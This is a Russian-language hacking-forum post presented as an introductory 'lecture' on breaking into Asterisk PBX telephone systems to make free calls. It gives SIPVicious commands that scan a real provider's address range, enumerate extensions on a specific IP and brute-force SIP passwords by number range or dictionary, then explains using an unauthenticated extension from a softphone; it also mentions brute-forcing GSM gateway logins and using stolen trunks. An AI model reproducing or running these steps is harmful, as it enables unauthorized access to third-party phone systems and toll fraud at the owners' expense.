Основан 26 Июля 2013 года
freehacks.ru fhacks.me fhacks.pw fhacksnplmzxaaoo.onion
HashFlare
Показано с 1 по 2 из 2
  1. #1
    TopicStarter
    Аватар для Suicidemouse

    Статус
    Offline
    Регистрация
    02.12.2013
    Сообщений
    351
    Репутация
    149 + / -
    Безопасность

    Бесплатные звонки или взлом Asterisk PBX


    Здравствуйте, сегодня я проведу вводную лекцию на тему SIP телефонии и взлома электронной АТС Asterisk.
    Для начала попытаемся разобраться с общими понятиями:
    1)SIP (Session Initiation Protocol — протокол установления сеанса) Клиенты SIP традиционно используют порт 5060 TCP и UDP для соединения элементов SIP-сети. В основном, SIP используется для установления и разъединения голосовых и видеозвонков. «SIP-телефония» позволяет пользоваться телефоном из любой точки мира, где есть интернет и совершать звонки по выгодным тарифам.
    2)Asterisk - — свободное решение компьютерной телефонии, Asterisk в комплексе с необходимым оборудованием обладает всеми возможностями классической АТС, поддерживает множество VoIP-протоколов и предоставляет богатые функции управления звонками.
    3)Сontext (Контекст) - План набора состоит из контекстов а те в свою очередь из экстеншенов(extensions) которые представляют из себя нечто вроде телефонной книги.
    4)SIP-trunk — это организация виртуальных каналов связи между цифровой АТС клиента и телефонной сетью.

    Контексты реализовывают различную важную функциональность, включая следующие возможности:

    • Безопасность: Можно разрешить междугородные/международные вызовы только конкретным абонентам.
    • Маршрутизация вызовов: Маршрутизация вызовов в зависимости от номера абонента.
    • Автосекретарь: Проигрывание приветствия и приглашение ввести добавочный номер.
    • Многоуровневые голосовые меню: Голосовые меню для службы поддержки, отдела продаж и т.д.
    • Авторизация: Запрос пароля для доступа к некоторым екстеншенам.
    • Обратный вызов: Позволяет уменьшить затраты на междугородние/международные вызовы.
    • Списки доступа: Занесение в черные списки надоедливых абонентов, не давая им возможности связаться с Вами.
    • Виртуальные АТС: Вы можете создать "виртуальную АТС" в пределах Вашей основной АТС.
    • Дневной/Ночной режим работы: Вы можете изменять поведение Вашей АТС в зависимости от времени суток.
    • Макросы: Можно создавать скрипты для решения повторяющихся задач в плане набора.






    Именно эти самые контексты и екстеншены и представляют для нас главный интерес.
    Сделав вид что мы что то понял из всего выше сказанного можно приступить к попыткам взлома.
    Я буду приводить пример на основе набора инструментов [Только зарегистрированные могут видеть это. ].

    SIPVicious это набор утилит для аудита SIP и VoIP систем, состоящий из 4х компонентов:

    • svmap - Сканер для обнаружения SIP сервисов на хосте
    • svwar - Утилита для обнаружения активных экстеншенов
    • svcrack - Собственно брутер паролей
    • svreport - тулза для сохранения отчетов в разных форматах
    • svcrash - не пользовал ее, но как я понял она должна против предотвращать попытки несанкционированного доступа.





    Все это добро написанно на Python'e 2.6 так что нам потребуется [Только зарегистрированные могут видеть это. ]

    Далее распаковываем SIPVicious например в С:\sip
    Начнем знакомство с сканера svmap.
    Запускаем из консоли cmd C:\sip>svmap.py
    Получаем ответ с кратким мануалом по использованию:
    C:\sip>svmap.py
    Usage: svmap.py [options] host1 host2 hostrange (Можно указать отдельный хост для проверки, либо перечислить несколько хостов через пробел)
    Scans for SIP devices on a given network
    examples:
    svmap.py 10.0.0.1-10.0.0.255 172.16.131.1 sipvicious.org/22 10.0.1.1/241.1.1.1-2 (либо можно указать диапазон адресов)
    0 1.1.2-20.* 4.1.*.*
    svmap.py -s session1 --randomize 10.0.0.1/8
    svmap.py --resume session1 -v
    svmap.py -p5060-5062 10.0.0.3-20 -m INVITE (если хост использует не стандартный порт 5060 то можно провести сканирование портов)
    Я же не стал замарачивать и вбил кусок диапозона адресов своего провайдера (команда дается с последующим сохранением полученного результата в текстовый файл result.txt для удобства)
    C:\sip>svmap.py 188.186.72.1-188.186.78.255 >C:\sip\result.txt
    Получаем следующее:

    Здесь мы видим список адресов у которых обнаружился открытый порт 5060.

    Ну вот у нас уже имеется материал для обработки...
    Далее можно пустить в ход наш следующий инструмент svwar.
    Выбираем из списка первый ip и пытаемся прочекать его на наличие открытых екстеншенов:
    C:\sip>svwar.py -e 100-2000 188.186.74.32 (где 100-2000 дипазон пиров)
    Если выдруг на выходе мы получим нечто вроде:
    | Extension | Authentication |
    -------------------------------
    | 607 | reqauth |
    | 606 | reqauth |
    | 601 | noauth |
    То можно доставать шампусик - мы нашли пир не требующий авторизации.
    Тогда можно качать любой софтфон например X-Lite, указываем в нем полученные данные (ip и пир 601) и звоним любимой бабушке на Колыму.
    //Даже если мы не нашли пир не требующий авторизации это уже неплохо, ибо теперь у нас есть список пиров (для простоты понимания... далее их можно использовать для подбора паролей к ним, как будто мы знаем логин но не знаем пароль)

    Но скорее всего нам выкатят бабареку в виде:
    ERROR:TakeASip:Response: 'SIP/2.0 401 Unauthorized\r\nVia: SIP/2.0/UDP 192.168.0
    .24:5060;branch=z9hG4bK-930260165;received=188.196.73.71;rport=5060\r\nFro m: "10
    1"<sip:[email protected]>;tag=3130310132313835313 832 323737\r\nTo: "101"<sip:[email protected]
    darma.com>;tag=as727add12\r\nCall-ID: 611756649\r\nCSeq: 1 REGISTER\r\nServer: Z
    adarma Voip\r\nAllow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIF
    Y, INFO, PUBLISH\r\nSupported: replaces, timer\r\nWWW-Authenticate: Digest algor
    ithm=MD5, realm="sip.zadarma.com", nonce="7ae0f892"\r\nContent-Length: 0\r\n\r\n
    Что говорит нам о том, что местный админ подсуетился и включил директиву alwaysauthreject = yes в sip.conf, которая при любых ошибках авторизации отвечает 401 Unauthorized.

    Теперь остается только грубая сила... и наш третий инструмент svcrack .
    svcrack.py -u1002 -r1-9999 188.186.74.32 (где 1002 пир для которого подбирается пароль, 1-9999 числа подставляемые в качестве пароля)
    Так же можно использовать атаку по словарю:
    C:\sip>svcrack.py -u100 -d dictionary.txt 188.186.74.32 (Где dictionary.txt файл словаря).
    Запускаем и ждем у моря погоды...
    Ну вот по большей части все, что можно сказать о sipvicious, больше инфы можно найти в официальной ВиКи (там же откуда скачивали пакет sipvicious).
    Можно конечно подойти к взлому с другой стороны.... для этого потребуется подбирать пароли к gsm шлюзу... другое дело что его не так то просто найти на просторах сети.
    Выглядит это примерно так
    Форма авторизации брутится посредством bruteforce aet2

    Далее находим транки и пароли для них

    но на этом все не заканчивается, вам придется поднимать свой астериск с шлюхами и блекджеком, конфигурировать его и использовать спизженные транки, а это уже совсем другая история))
    Не забываем, что лекция была вводной, но тем не менее надеюсь она вам понравилась) Искренне ваш SuicideMouse.
    «Вози кусты и героин, а то останешься рабом» © Буравчик

  2. 3 пользователя(ей) сказали cпасибо:
  3. #2
    TopicStarter
    Аватар для Suicidemouse

    Статус
    Offline
    Регистрация
    02.12.2013
    Сообщений
    351
    Репутация
    149 + / -
    Безопасность
    Эта статья выкладывалась мною для конкурса [Только зарегистрированные могут видеть это. ]
    Но т.к на него все забили, а я чего то вспомнил про это... выкладываю на паблик. Материал не слишком свежий но и не шибко распространенный.
    Перенес как есть (вроде бы), особо не замарачивался и не проверял дотошно) визуально вроде все правильно)
    Последний раз редактировалось Suicidemouse; 25.10.2014 в 11:58.
    «Вози кусты и героин, а то останешься рабом» © Буравчик

Метки этой темы

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Информация на сайте предоставлена исключительно в ознакомительных целях, использование знаний в противозаконных целях преследуется по закону! Администрация не несет ответственности за ваши деяния.